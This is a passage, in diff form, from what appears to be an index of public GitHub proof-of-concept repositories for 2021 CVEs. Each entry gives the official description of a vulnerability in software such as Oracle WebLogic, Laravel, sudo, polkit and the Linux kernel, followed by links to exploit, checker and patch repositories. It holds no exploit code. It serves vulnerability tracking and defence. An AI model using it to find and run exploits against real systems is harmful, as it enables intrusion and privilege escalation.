impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N). + + +- [emad-almousa/CVE-2021-2173](https://github.com/emad-almousa/CVE-2021-2173) + +### CVE-2021-2175 (2021-04-22) + +Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N). + + +- [emad-almousa/CVE-2021-2175](https://github.com/emad-almousa/CVE-2021-2175) + +### CVE-2021-2302 (2021-04-22) + +Vulnerability in the Oracle Platform Security for Java product of Oracle Fusion Middleware (component: OPSS). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Platform Security for Java. Successful attacks of this vulnerability can result in takeover of Oracle Platform Security for Java. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [quynhle7821/CVE-2021-2302](https://github.com/quynhle7821/CVE-2021-2302) + +### CVE-2021-2394 (2021-07-20) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [lz2y/CVE-2021-2394](https://github.com/lz2y/CVE-2021-2394) +- [freeide/CVE-2021-2394](https://github.com/freeide/CVE-2021-2394) +- [BabyTeam1024/CVE-2021-2394](https://github.com/BabyTeam1024/CVE-2021-2394) +- [fasanhlieu/CVE-2021-2394](https://github.com/fasanhlieu/CVE-2021-2394) + +### CVE-2021-2456 (2021-07-20) + +Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [peterjson31337/CVE-2021-2456](https://github.com/peterjson31337/CVE-2021-2456) + +### CVE-2021-2471 (2021-10-20) + +Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. CVSS 3.1 Base Score 5.9 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H). + + +- [SecCoder-Security-Lab/jdbc-sqlxml-xxe](https://github.com/SecCoder-Security-Lab/jdbc-sqlxml-xxe) +- [cckuailong/CVE-2021-2471](https://github.com/cckuailong/CVE-2021-2471) +- [DrunkenShells/CVE-2021-2471](https://github.com/DrunkenShells/CVE-2021-2471) + +### CVE-2021-3007 (2021-01-04) + +Laminas Project laminas-http before 2.14.2, and Zend Framework 3.0.0, has a deserialization vulnerability that can lead to remote code execution if the content is controllable, related to the __destruct method of the Zend\Http\Response\Stream class in Stream.php. NOTE: Zend Framework is no longer supported by the maintainer. NOTE: the laminas-http vendor considers this a "vulnerability in the PHP language itself" but has added certain type checking as a way to prevent exploitation in (unrecommended) use cases where attacker-supplied data can be deserialized + + +- [Vulnmachines/ZF3_CVE-2021-3007](https://github.com/Vulnmachines/ZF3_CVE-2021-3007) + +### CVE-2021-3019 (2021-01-05) + +ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet. + + +- [B1anda0/CVE-2021-3019](https://github.com/B1anda0/CVE-2021-3019) +- [0xf4n9x/CVE-2021-3019](https://github.com/0xf4n9x/CVE-2021-3019) +- [Maksim-venus/CVE-2021-3019](https://github.com/Maksim-venus/CVE-2021-3019) +- [murataydemir/CVE-2021-3019](https://github.com/murataydemir/CVE-2021-3019) +- [Aoyuh/cve-2021-3019](https://github.com/Aoyuh/cve-2021-3019) +- [givemefivw/CVE-2021-3019](https://github.com/givemefivw/CVE-2021-3019) +- [qiezi-maozi/CVE-2021-3019-Lanproxy](https://github.com/qiezi-maozi/CVE-2021-3019-Lanproxy) +- [a1665454764/CVE-2021-3019](https://github.com/a1665454764/CVE-2021-3019) + +### CVE-2021-3060 (2021-11-10) + +An OS command injection vulnerability in the Simple Certificate Enrollment Protocol (SCEP) feature of PAN-OS software allows an unauthenticated network-based attacker with specific knowledge of the firewall configuration to execute arbitrary code with root user privileges. The attacker must have network access to the GlobalProtect interfaces to exploit this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers with Prisma Access 2.1 Preferred and Prisma Access 2.1 Innovation firewalls are impacted by this issue. + + +- [timb-machine-mirrors/rqu1-cve-2021-3060.py](https://github.com/timb-machine-mirrors/rqu1-cve-2021-3060.py) +- [anmolksachan/CVE-2021-3060](https://github.com/anmolksachan/CVE-2021-3060) + +### CVE-2021-3064 (2021-11-10) + +A memory corruption vulnerability exists in Palo Alto Networks GlobalProtect portal and gateway interfaces that enables an unauthenticated network-based attacker to disrupt system processes and potentially execute arbitrary code with root privileges. The attacker must have network access to the GlobalProtect interface to exploit this issue. This issue impacts PAN-OS 8.1 versions earlier than PAN-OS 8.1.17. Prisma Access customers are not impacted by this issue. + + +- [0xhaggis/CVE-2021-3064](https://github.com/0xhaggis/CVE-2021-3064) + +### CVE-2021-3122 (2021-02-07) + +CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only on devices with a certain "misconfiguration." + + +- [acquiredsecurity/CVE-2021-3122-Details](https://github.com/acquiredsecurity/CVE-2021-3122-Details) + +### CVE-2021-3129 (2021-01-12) + +Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. + + +- [ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits) +- [SNCKER/CVE-2021-3129](https://github.com/SNCKER/CVE-2021-3129) +- [SecPros-Team/laravel-CVE-2021-3129-EXP](https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP) +- [crisprss/Laravel_CVE-2021-3129_EXP](https://github.com/crisprss/Laravel_CVE-2021-3129_EXP) +- [nth347/CVE-2021-3129_exploit](https://github.com/nth347/CVE-2021-3129_exploit) +- [FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129](https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129) +- [zhzyker/CVE-2021-3129](https://github.com/zhzyker/CVE-2021-3129) +- [Y0s9/CVE-2021-3129](https://github.com/Y0s9/CVE-2021-3129) +- [idea-oss/laravel-CVE-2021-3129-EXP](https://github.com/idea-oss/laravel-CVE-2021-3129-EXP) +- [knqyf263/CVE-2021-3129](https://github.com/knqyf263/CVE-2021-3129) +- [cuongtop4598/CVE-2021-3129-Script](https://github.com/cuongtop4598/CVE-2021-3129-Script) +- [joshuavanderpoll/CVE-2021-3129](https://github.com/joshuavanderpoll/CVE-2021-3129) +- [shadowabi/Laravel-CVE-2021-3129](https://github.com/shadowabi/Laravel-CVE-2021-3129) +- [JacobEbben/CVE-2021-3129](https://github.com/JacobEbben/CVE-2021-3129) +- [hupe1980/CVE-2021-3129](https://github.com/hupe1980/CVE-2021-3129) +- [0nion1/CVE-2021-3129](https://github.com/0nion1/CVE-2021-3129) +- [MadExploits/Laravel-debug-Checker](https://github.com/MadExploits/Laravel-debug-Checker) +- [ajisai-babu/CVE-2021-3129-exp](https://github.com/ajisai-babu/CVE-2021-3129-exp) +- [keyuan15/CVE-2021-3129](https://github.com/keyuan15/CVE-2021-3129) +- [qaisarafridi/cve-2021-3129](https://github.com/qaisarafridi/cve-2021-3129) +- [Zoo1sondv/CVE-2021-3129](https://github.com/Zoo1sondv/CVE-2021-3129) +- [miko550/CVE-2021-3129](https://github.com/miko550/CVE-2021-3129) +- [wmasday/CVE-2021-3129](https://github.com/wmasday/CVE-2021-3129) +- [banyaksepuh/Mass-CVE-2021-3129-Scanner](https://github.com/banyaksepuh/Mass-CVE-2021-3129-Scanner) +- [Axianke/CVE-2021-3129](https://github.com/Axianke/CVE-2021-3129) +- [cc3305/CVE-2021-3129](https://github.com/cc3305/CVE-2021-3129) +- [piperpwn/CVE-2021-3129-](https://github.com/piperpwn/CVE-2021-3129-) +- [0x0d3ad/CVE-2021-3129](https://github.com/0x0d3ad/CVE-2021-3129) +- [GodOfServer/CVE-2021-3129](https://github.com/GodOfServer/CVE-2021-3129) + +### CVE-2021-3130 (2021-01-20) + +Within the Open-AudIT up to version 3.5.3 application, the web interface hides SSH secrets, Windows passwords, and SNMP strings from users using HTML 'password field' obfuscation. By using Developer tools or similar, it is possible to change the obfuscation so that the credentials are visible. + + +- [jet-pentest/CVE-2021-3130](https://github.com/jet-pentest/CVE-2021-3130) + +### CVE-2021-3131 (2021-01-13) + +The Web server in 1C:Enterprise 8 before 8.3.17.1851 sends base64 encoded credentials in the creds URL parameter. + + +- [jet-pentest/CVE-2021-3131](https://github.com/jet-pentest/CVE-2021-3131) + +### CVE-2021-3138 (2021-01-14) + +In Discourse 2.7.0 through beta1, a rate-limit bypass leads to a bypass of the 2FA requirement for certain forms. + + +- [Mesh3l911/CVE-2021-3138](https://github.com/Mesh3l911/CVE-2021-3138) + +### CVE-2021-3156 (2021-01-26) + +Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character. + + +- [mr-r3b00t/CVE-2021-3156](https://github.com/mr-r3b00t/CVE-2021-3156) +- [nexcess/sudo_cve-2021-3156](https://github.com/nexcess/sudo_cve-2021-3156) +- [reverse-ex/CVE-2021-3156](https://github.com/reverse-ex/CVE-2021-3156) +- [unauth401/CVE-2021-3156](https://github.com/unauth401/CVE-2021-3156) +- [ymrsmns/CVE-2021-3156](https://github.com/ymrsmns/CVE-2021-3156) +- [elbee-cyber/CVE-2021-3156-PATCHER](https://github.com/elbee-cyber/CVE-2021-3156-PATCHER) +- [kernelzeroday/CVE-2021-3156-Baron-Samedit](https://github.com/kernelzeroday/CVE-2021-3156-Baron-Samedit) +- [yaunsky/cve-2021-3156](https://github.com/yaunsky/cve-2021-3156) +- [baka9moe/CVE-2021-3156-Exp](https://github.com/baka9moe/CVE-2021-3156-Exp) +- [ph4ntonn/CVE-2021-3156](https://github.com/ph4ntonn/CVE-2021-3156) +- [binw2018/CVE-2021-3156-SCRIPT](https://github.com/binw2018/CVE-2021-3156-SCRIPT) +- [freeFV/CVE-2021-3156](https://github.com/freeFV/CVE-2021-3156) +- [mbcrump/CVE-2021-3156](https://github.com/mbcrump/CVE-2021-3156) +- [stong/CVE-2021-3156](https://github.com/stong/CVE-2021-3156) +- [nobodyatall648/CVE-2021-3156](https://github.com/nobodyatall648/CVE-2021-3156) +- [blasty/CVE-2021-3156](https://github.com/blasty/CVE-2021-3156) +- [teamtopkarl/CVE-2021-3156](https://github.com/teamtopkarl/CVE-2021-3156) +- [Q4n/CVE-2021-3156](https://github.com/Q4n/CVE-2021-3156) +- [kal1gh0st/CVE-2021-3156](https://github.com/kal1gh0st/CVE-2021-3156) +- [apogiatzis/docker-CVE-2021-3156](https://github.com/apogiatzis/docker-CVE-2021-3156) +- [voidlsd/CVE-2021-3156](https://github.com/voidlsd/CVE-2021-3156) +- [Ashish-dawani/CVE-2021-3156-Patch](https://github.com/Ashish-dawani/CVE-2021-3156-Patch) +- [SantiagoSerrao/ScannerCVE-2021-3156](https://github.com/SantiagoSerrao/ScannerCVE-2021-3156) +- [DanielAzulayy/CTF-2021](https://github.com/DanielAzulayy/CTF-2021) +- [cdeletre/Serpentiel-CVE-2021-3156](https://github.com/cdeletre/Serpentiel-CVE-2021-3156) +- [dinhbaouit/CVE-2021-3156](https://github.com/dinhbaouit/CVE-2021-3156) +- [CptGibbon/CVE-2021-3156](https://github.com/CptGibbon/CVE-2021-3156) +- [perlun/sudo-1.8.3p1-patched](https://github.com/perlun/sudo-1.8.3p1-patched) +- [1N53C/CVE-2021-3156-PoC](https://github.com/1N53C/CVE-2021-3156-PoC) +- [0xdevil/CVE-2021-3156](https://github.com/0xdevil/CVE-2021-3156) +- [gmldbd94/cve-2021-3156](https://github.com/gmldbd94/cve-2021-3156) +- [jm33-m0/CVE-2021-3156](https://github.com/jm33-m0/CVE-2021-3156) +- [Rvn0xsy/CVE-2021-3156-plus](https://github.com/Rvn0xsy/CVE-2021-3156-plus) +- [r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability](https://github.com/r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability) +- [oneoy/CVE-2021-3156](https://github.com/oneoy/CVE-2021-3156) +- [worawit/CVE-2021-3156](https://github.com/worawit/CVE-2021-3156) +- [lmol/CVE-2021-3156](https://github.com/lmol/CVE-2021-3156) +- [BearCat4/CVE-2021-3156](https://github.com/BearCat4/CVE-2021-3156) +- [ZTK-009/CVE-2021-3156](https://github.com/ZTK-009/CVE-2021-3156) +- [capturingcats/CVE-2021-3156](https://github.com/capturingcats/CVE-2021-3156) +- [LiveOverflow/pwnedit](https://github.com/LiveOverflow/pwnedit) +- [ajtech-hue/CVE-2021-3156-Mitigation-ShellScript-Build](https://github.com/ajtech-hue/CVE-2021-3156-Mitigation-ShellScript-Build) +- [donghyunlee00/CVE-2021-3156](https://github.com/donghyunlee00/CVE-2021-3156) +- [TheFlash2k/CVE-2021-3156](https://github.com/TheFlash2k/CVE-2021-3156) +- [Exodusro/CVE-2021-3156](https://github.com/Exodusro/CVE-2021-3156) +- [CyberCommands/CVE-2021-3156](https://github.com/CyberCommands/CVE-2021-3156) +- [0x7183/CVE-2021-3156](https://github.com/0x7183/CVE-2021-3156) +- [redhawkeye/sudo-exploit](https://github.com/redhawkeye/sudo-exploit) +- [d3c3ptic0n/CVE-2021-3156](https://github.com/d3c3ptic0n/CVE-2021-3156) +- [musergi/CVE-2021-3156](https://github.com/musergi/CVE-2021-3156) +- [halissha/CVE-2021-3156](https://github.com/halissha/CVE-2021-3156) +- [sharkmoos/Baron-Samedit](https://github.com/sharkmoos/Baron-Samedit) +- [chenaotian/CVE-2021-3156](https://github.com/chenaotian/CVE-2021-3156) +- [ret2basic/SudoScience](https://github.com/ret2basic/SudoScience) +- [puckiestyle/CVE-2021-3156](https://github.com/puckiestyle/CVE-2021-3156) +- [barebackbandit/CVE-2021-3156](https://github.com/barebackbandit/CVE-2021-3156) +- [RodricBr/CVE-2021-3156](https://github.com/RodricBr/CVE-2021-3156) +- [ypl6/heaplens](https://github.com/ypl6/heaplens) +- [q77190858/CVE-2021-3156](https://github.com/q77190858/CVE-2021-3156) +- [arvindshima/CVE-2021-3156](https://github.com/arvindshima/CVE-2021-3156) +- [Mhackiori/CVE-2021-3156](https://github.com/Mhackiori/CVE-2021-3156) +- [PhuketIsland/CVE-2021-3156-centos7](https://github.com/PhuketIsland/CVE-2021-3156-centos7) +- [0x4ndy/clif](https://github.com/0x4ndy/clif) +- [hycheng15/CVE-2021-3156](https://github.com/hycheng15/CVE-2021-3156) +- [mutur4/CVE-2021-3156](https://github.com/mutur4/CVE-2021-3156) +- [PurpleOzone/PE_CVE-CVE-2021-3156](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156) +- [asepsaepdin/CVE-2021-3156](https://github.com/asepsaepdin/CVE-2021-3156) +- [DDayLuong/CVE-2021-3156](https://github.com/DDayLuong/CVE-2021-3156) +- [DASICS-ICT/DASICS-CVE-2021-3156](https://github.com/DASICS-ICT/DASICS-CVE-2021-3156) +- [wurwur/CVE-2021-3156](https://github.com/wurwur/CVE-2021-3156) +- [SamTruss/LMU-CVE-2021-3156](https://github.com/SamTruss/LMU-CVE-2021-3156) +- [lypd0/CVE-2021-3156-checker](https://github.com/lypd0/CVE-2021-3156-checker) +- [Typical0day/CVE-2021-3156](https://github.com/Typical0day/CVE-2021-3156) +- [acidburn2049/CVE-2021-3156](https://github.com/acidburn2049/CVE-2021-3156) +- [Bad3r/CVE-2021-3156-without-ip-command](https://github.com/Bad3r/CVE-2021-3156-without-ip-command) + +### CVE-2021-3157 +- [CrackerCat/cve-2021-3157](https://github.com/CrackerCat/cve-2021-3157) + +### CVE-2021-3164 (2021-01-21) + +ChurchRota 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file via a POST request to resources.php. + + +- [rmccarth/cve-2021-3164](https://github.com/rmccarth/cve-2021-3164) + +### CVE-2021-3166 (2021-01-18) + +An issue was discovered on ASUS DSL-N14U-B1 1.1.2.3_805 devices. An attacker can upload arbitrary file content as a firmware update when the filename Settings_DSL-N14U-B1.trx is used. Once this file is loaded, shutdown measures on a wide range of services are triggered as if it were a real update, resulting in a persistent outage of those services. + + +- [kaisersource/CVE-2021-3166](https://github.com/kaisersource/CVE-2021-3166) + +### CVE-2021-3229 (2021-02-05) + +Denial of service in ASUSWRT ASUS RT-AX3000 firmware versions 3.0.0.4.384_10177 and earlier versions allows an attacker to disrupt the use of device setup services via continuous login error. + + +- [fullbbadda1208/CVE-2021-3229](https://github.com/fullbbadda1208/CVE-2021-3229) + +### CVE-2021-3279 (2021-07-19) + +sz.chat version 4 allows injection of web scripts and HTML in the message box. + + +- [rafaelchriss/CVE-2021-3279](https://github.com/rafaelchriss/CVE-2021-3279) + +### CVE-2021-3281 (2021-02-02) + +In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by "startapp --template" and "startproject --template") allows directory traversal via an archive with absolute paths or relative paths with dot segments. + + +- [lwzSoviet/CVE-2021-3281](https://github.com/lwzSoviet/CVE-2021-3281) + +### CVE-2021-3291 (2021-01-26) + +Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command. + + +- [ImHades101/CVE-2021-3291](https://github.com/ImHades101/CVE-2021-3291) + +### CVE-2021-3310 (2021-03-10) + +Western Digital My Cloud OS 5 devices before 5.10.122 mishandle Symbolic Link Following on SMB and AFP shares. This can lead to code execution and information disclosure (by reading local files). + + +- [piffd0s/CVE-2021-3310](https://github.com/piffd0s/CVE-2021-3310) + +### CVE-2021-3317 (2021-01-26) + +KLog Server through 2.4.1 allows authenticated command injection. async.php calls shell_exec() on the original value of the source parameter. + + +- [Al1ex/CVE-2021-3317](https://github.com/Al1ex/CVE-2021-3317) + +### CVE-2021-3345 (2021-01-29) + +_gcry_md_block_write in cipher/hash-common.c in Libgcrypt version 1.9.0 has a heap-based buffer overflow when the digest final function sets a large count value. It is recommended to upgrade to 1.9.1 or later. + + +- [MLGRadish/CVE-2021-3345](https://github.com/MLGRadish/CVE-2021-3345) +- [SpiralBL0CK/CVE-2021-3345](https://github.com/SpiralBL0CK/CVE-2021-3345) + +### CVE-2021-3347 (2021-01-29) + +An issue was discovered in the Linux kernel through 5.10.11. PI futexes have a kernel stack use-after-free during fault handling, allowing local users to execute code in the kernel, aka CID-34b1a1ce1458. + + +- [nanopathi/linux-4.19.72_CVE-2021-3347](https://github.com/nanopathi/linux-4.19.72_CVE-2021-3347) + +### CVE-2021-3360 +- [tcbutler320/CVE-2021-3360](https://github.com/tcbutler320/CVE-2021-3360) + +### CVE-2021-3378 (2021-02-01) + +FortiLogger 4.4.2.2 is affected by Arbitrary File Upload by sending a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then visiting Assets/temp/hotspot/img/logohotspot.asp. + + +- [erberkan/fortilogger_arbitrary_fileupload](https://github.com/erberkan/fortilogger_arbitrary_fileupload) + +### CVE-2021-3395 (2021-02-02) + +A cross-site scripting (XSS) vulnerability in Pryaniki 6.44.3 allows remote authenticated users to upload an arbitrary file. The JavaScript code will execute when someone visits the attachment. + + +- [jet-pentest/CVE-2021-3395](https://github.com/jet-pentest/CVE-2021-3395) + +### CVE-2021-3438 (2021-05-20) + +A potential buffer overflow in the software drivers for certain HP LaserJet products and Samsung product printers could lead to an escalation of privilege. + + +- [TobiasS1402/CVE-2021-3438](https://github.com/TobiasS1402/CVE-2021-3438) +- [CrackerCat/CVE-2021-3438](https://github.com/CrackerCat/CVE-2021-3438) + +### CVE-2021-3441 (2021-10-29) + +A potential security vulnerability has been identified for the HP OfficeJet 7110 Wide Format ePrinter that enables Cross-Site Scripting (XSS). + + +- [tcbutler320/CVE-2021-3441-check](https://github.com/tcbutler320/CVE-2021-3441-check) + +### CVE-2021-3449 (2021-03-25) + +An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j). + + +- [riptl/cve-2021-3449](https://github.com/riptl/cve-2021-3449) + +### CVE-2021-3490 (2021-06-04) + +The eBPF ALU32 bounds tracking for bitwise ops (AND, OR and XOR) in the Linux kernel did not properly update 32-bit bounds, which could be turned into out of bounds reads and writes in the Linux kernel and therefore, arbitrary code execution. This issue was fixed via commit 049c4e13714e ("bpf: Fix alu32 const subreg bound tracking on bitwise operations") (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. The AND/OR issues were introduced by commit 3f50f132d840 ("bpf: Verifier, do explicit ALU32 bounds tracking") (5.7-rc1) and the XOR variant was introduced by 2921c90d4718 ("bpf:Fix a verifier failure with xor") ( 5.10-rc1). + + +- [chompie1337/Linux_LPE_eBPF_CVE-2021-3490](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490) +- [pivik271/CVE-2021-3490](https://github.com/pivik271/CVE-2021-3490) +- [BanaxavSplit/CVE-2021-3490](https://github.com/BanaxavSplit/CVE-2021-3490) + +### CVE-2021-3492 (2021-04-17) + +Shiftfs, an out-of-tree stacking file system included in Ubuntu Linux kernels, did not properly handle faults occurring during copy_from_user() correctly. These could lead to either a double-free situation or memory not being freed at all. An attacker could use this to cause a denial of service (kernel memory exhaustion) or gain privileges via executing arbitrary code. AKA ZDI-CAN-13562. + + +- [synacktiv/CVE-2021-3492](https://github.com/synacktiv/CVE-2021-3492) + +### CVE-2021-3493 (2021-04-17) + +The overlayfs implementation in the linux kernel did not properly validate with respect to user namespaces the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces along with a patch carried in the Ubuntu kernel to allow unprivileged overlay mounts, an attacker could use this to gain elevated privileges. + + +- [briskets/CVE-2021-3493](https://github.com/briskets/CVE-2021-3493) +- [oneoy/CVE-2021-3493](https://github.com/oneoy/CVE-2021-3493) +- [Abdennour-py/CVE-2021-3493](https://github.com/Abdennour-py/CVE-2021-3493) +- [inspiringz/CVE-2021-3493](https://github.com/inspiringz/CVE-2021-3493) +- [derek-turing/CVE-2021-3493](https://github.com/derek-turing/CVE-2021-3493) +- [cerodah/overlayFS-CVE-2021-3493](https://github.com/cerodah/overlayFS-CVE-2021-3493) +- [puckiestyle/CVE-2021-3493](https://github.com/puckiestyle/CVE-2021-3493) +- [fei9747/CVE-2021-3493](https://github.com/fei9747/CVE-2021-3493) +- [pmihsan/OverlayFS-CVE-2021-3493](https://github.com/pmihsan/OverlayFS-CVE-2021-3493) +- [smallkill/CVE-2021-3493](https://github.com/smallkill/CVE-2021-3493) +- [ptkhai15/OverlayFS---CVE-2021-3493](https://github.com/ptkhai15/OverlayFS---CVE-2021-3493) +- [iamz24/CVE-2021-3493_CVE-2022-3357](https://github.com/iamz24/CVE-2021-3493_CVE-2022-3357) +- [fathallah17/OverlayFS-CVE-2021-3493](https://github.com/fathallah17/OverlayFS-CVE-2021-3493) + +### CVE-2021-3516 (2021-06-01) + +There's a flaw in libxml2's xmllint in versions before 2.9.11. An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability. + + +- [dja2TaqkGEEfA45/CVE-2021-3516](https://github.com/dja2TaqkGEEfA45/CVE-2021-3516) + +### CVE-2021-3560 (2022-02-16) + +It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. + + +- [aancw/polkit-auto-exploit](https://github.com/aancw/polkit-auto-exploit) +- [swapravo/polkadots](https://github.com/swapravo/polkadots) +- [hakivvi/CVE-2021-3560](https://github.com/hakivvi/CVE-2021-3560) +- [iSTAR-Lab/CVE-2021-3560_PoC](https://github.com/iSTAR-Lab/CVE-2021-3560_PoC) +- [secnigma/CVE-2021-3560-Polkit-Privilege-Esclation](https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation) +- [curtishoughton/CVE-2021-3560](https://github.com/curtishoughton/CVE-2021-3560) +- [Almorabea/Polkit-exploit](https://github.com/Almorabea/Polkit-exploit) +- [AssassinUKG/Polkit-CVE-2021-3560](https://github.com/AssassinUKG/Polkit-CVE-2021-3560) +- [cpu0x00/CVE-2021-3560](https://github.com/cpu0x00/CVE-2021-3560) +- [BizarreLove/CVE-2021-3560](https://github.com/BizarreLove/CVE-2021-3560) +- [0dayNinja/CVE-2021-3560](https://github.com/0dayNinja/CVE-2021-3560) +- [admin-079/CVE-2021-3560](https://github.com/admin-079/CVE-2021-3560) +- [chenaotian/CVE-2021-3560](https://github.com/chenaotian/CVE-2021-3560) +- [NeonWhiteRabbit/CVE-2021-3560](https://github.com/NeonWhiteRabbit/CVE-2021-3560) +- [f4T1H21/CVE-2021-3560-Polkit-DBus](https://github.com/f4T1H21/CVE-2021-3560-Polkit-DBus) +- [innxrmxst/CVE-2021-3560](https://github.com/innxrmxst/CVE-2021-3560) +- [RicterZ/CVE-2021-3560-Authentication-Agent](https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent) +- [WinMin/CVE-2021-3560](https://github.com/WinMin/CVE-2021-3560) +- [UNICORDev/exploit-CVE-2021-3560](https://github.com/UNICORDev/exploit-CVE-2021-3560) +- [asepsaepdin/CVE-2021-3560](https://github.com/asepsaepdin/CVE-2021-3560) +- [pashayogi/ROOT-CVE-2021-3560](https://github.com/pashayogi/ROOT-CVE-2021-3560) +- [TieuLong21Prosper/CVE-2021-3560](https://github.com/TieuLong21Prosper/CVE-2021-3560) +- [LucasPDiniz/CVE-2021-3560](https://github.com/LucasPDiniz/CVE-2021-3560) +- [markyu0401/CVE-2021-3560-Polkit-Privilege-Escalation](https://github.com/markyu0401/CVE-2021-3560-Polkit-Privilege-Escalation) +- [Kyyomaa/CVE-2021-3560-EXPLOIT](https://github.com/Kyyomaa/CVE-2021-3560-EXPLOIT) + +### CVE-2021-3572 (2021-11-10) + +A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1. + + +- [frenzymadness/CVE-2021-3572](https://github.com/frenzymadness/CVE-2021-3572) + +### CVE-2021-3625 (2021-10-05) + +Buffer overflow in Zephyr USB DFU DNLOAD. Zephyr versions >= v2.5.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-c3gr-hgvr-f363 + + +- [szymonh/zephyr_cve-2021-3625](https://github.com/szymonh/zephyr_cve-2021-3625) + +### CVE-2021-3656 (2022-03-04) + +A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the "virt_ext" field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. + + +- 